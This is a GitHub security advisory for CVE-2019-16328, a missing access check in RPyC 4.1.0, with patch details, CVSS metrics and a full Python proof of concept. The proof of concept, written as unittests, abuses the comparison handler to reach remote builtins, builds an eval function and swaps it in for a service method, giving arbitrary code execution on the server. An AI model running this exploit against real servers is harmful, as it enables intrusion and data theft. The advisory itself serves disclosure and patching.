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Dynamic modification of RPyC service due to missing security check

High severity GitHub Reviewed Published Feb 16, 2021 in tomerfiliba-org/rpyc • Updated Jan 27, 2023

Package

pip rpyc (pip)

Affected versions

= 4.1.0

Patched versions

4.1.1

Description

Impact

Version 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks.

Patches

Git commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected.

Workarounds

The commit d818ecc83a92548994db75a0e9c419c7bce680d6 could be used as a patch to add the missing access check.

References

CVE-2019-16328
RPyC Security Documentation

For more information

If you have any questions or comments about this advisory:

Proof of Concept

import logging
import rpyc
import tempfile
from subprocess import Popen, PIPE
import unittest


PORT = 18861
SERVER_SCRIPT = f"""#!/usr/bin/env python
import rpyc
from rpyc.utils.server import ThreadedServer, ThreadPoolServer
from rpyc import SlaveService
import rpyc


class Foe(object):
    foo = "bar"


class Fee(rpyc.Service):
    exposed_Fie = Foe

    def exposed_nop(self):
        return


if __name__ == "__main__":
    server = ThreadedServer(Fee, port={PORT}, auto_register=False)
    thd = server.start()
"""


def setattr_orig(target, attrname, codeobj):
    setattr(target, attrname, codeobj)


def myeval(self=None, cmd="__import__('sys')"):
    return eval(cmd)


def get_code(obj_codetype, func, filename=None, name=None):
    func_code = func.__code__
    arg_names = ['co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize', 'co_flags',
                 'co_code', 'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name', 'co_firstlineno',
                 'co_lnotab', 'co_freevars', 'co_cellvars']

    codetype_args = [getattr(func_code, n) for n in arg_names]
    if filename:
        codetype_args[arg_names.index('co_filename')] = filename
    if name:
        codetype_args[arg_names.index('co_name')] = name
    mycode = obj_codetype(*codetype_args)
    return mycode


def _vercmp_gt(ver1, ver2):
    ver1_gt_ver2 = False
    for i, v1 in enumerate(ver1):
        v2 = ver2[i]
        if v1 > v2:
            ver1_gt_ver2 = True
            break
        elif v1 == v2:
            continue
        else:  # v1 < v2
            break
    return ver1_gt_ver2


@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), "unaffected version")
class Test_InfoDisclosure_Service(unittest.TestCase):

    @classmethod
    def setUpClass(cls):

        cls.logger = logging.getLogger('rpyc')
        cls.logger.setLevel(logging.DEBUG)  # NOTSET only traverses until another level is found, so DEBUG is preferred
        cls.hscript = tempfile.NamedTemporaryFile()
        cls.hscript.write(SERVER_SCRIPT.encode())
        cls.hscript.flush()
        while cls.hscript.file.tell() != len(SERVER_SCRIPT):
            pass
        cls.server = Popen(["python", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True)
        cls.conn = rpyc.connect("localhost", PORT)

    @classmethod
    def tearDownClass(cls):
        cls.conn.close()
        cls.logger.info(cls.server.stdout.read())
        cls.logger.info(cls.server.stderr.read())
        cls.server.kill()
        cls.hscript.close()

    def netref_getattr(self, netref, attrname):
        # PoC CWE-358: abuse __cmp__ function that was missing a security check
        handler = rpyc.core.consts.HANDLE_CMP
        return self.conn.sync_request(handler, netref, attrname, '__getattribute__')

    def test_1_modify_nop(self):
        # create netrefs for builtins and globals that will be used to construct on remote
        remote_svc_proto = self.netref_getattr(self.conn.root, '_protocol')
        remote_dispatch = self.netref_getattr(remote_svc_proto, '_dispatch_request')
        remote_class_globals = self.netref_getattr(remote_dispatch, '__globals__')
        remote_modules = self.netref_getattr(remote_class_globals['sys'], 'modules')
        _builtins = remote_modules['builtins']
        remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)}

        # populate globals for CodeType calls on remote
        remote_globals = remote_builtins['dict']()
        for name, netref in remote_builtins.items():
            remote_globals[name] = netref
        for name, netref in self.netref_getattr(remote_modules, 'items')():
            remote_globals[name] = netref

        # create netrefs for types to create remote function malicously
        remote_types = remote_builtins['__import__']("types")
        remote_types_CodeType = self.netref_getattr(remote_types, 'CodeType')
        remote_types_FunctionType = self.netref_getattr(remote_types, 'FunctionType')

        # remote eval function constructed
        remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename='test_code.py', name='__code__')
        remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals)
        # PoC CWE-913: modify the exposed_nop of service
        #   by binding various netrefs in this execution frame, they are cached in
        #   the remote address space. setattr and eval functions are cached for the life
        #   of the netrefs in the frame. A consequence of Netref classes inheriting
        #   BaseNetref, each object is cached under_local_objects. So, we are able
        #   to construct arbitrary code using types and builtins.

        # use the builtin netrefs to modify the service to use the constructed eval func
        remote_setattr = remote_builtins['setattr']
        remote_type = remote_builtins['type']
        remote_setattr(remote_type(self.conn.root), 'exposed_nop', remote_eval)

        # show that nop was replaced by eval to complete the PoC
        remote_sys = self.conn.root.nop('__import__("sys")')
        remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
        self.assertEqual(type(remote_sys).__name__, 'builtins.module')
        self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
        self.assertIn('rpyc/utils/server.py', remote_stack)

    def test_2_new_conn_impacted(self):
        # demostrate impact and scope of vuln for new connections
        self.conn.close()
        self.conn = rpyc.connect("localhost", PORT)
        # show new conn can still use nop as eval
        remote_sys = self.conn.root.nop('__import__("sys")')
        remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
        self.assertEqual(type(remote_sys).__name__, 'builtins.module')
        self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
        self.assertIn('rpyc/utils/server.py', remote_stack)


if __name__ == "__main__":
    unittest.main()

References

Published by the National Vulnerability Database Oct 3, 2019
@comrumino comrumino published to tomerfiliba-org/rpyc Feb 16, 2021
Reviewed Feb 17, 2021
Published to the GitHub Advisory Database Feb 17, 2021
Last updated Jan 27, 2023

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

EPSS score

77.922%
(98th percentile)

CVE ID

CVE-2019-16328

GHSA ID

GHSA-pj4g-4488-wmxm

Source code

Credits

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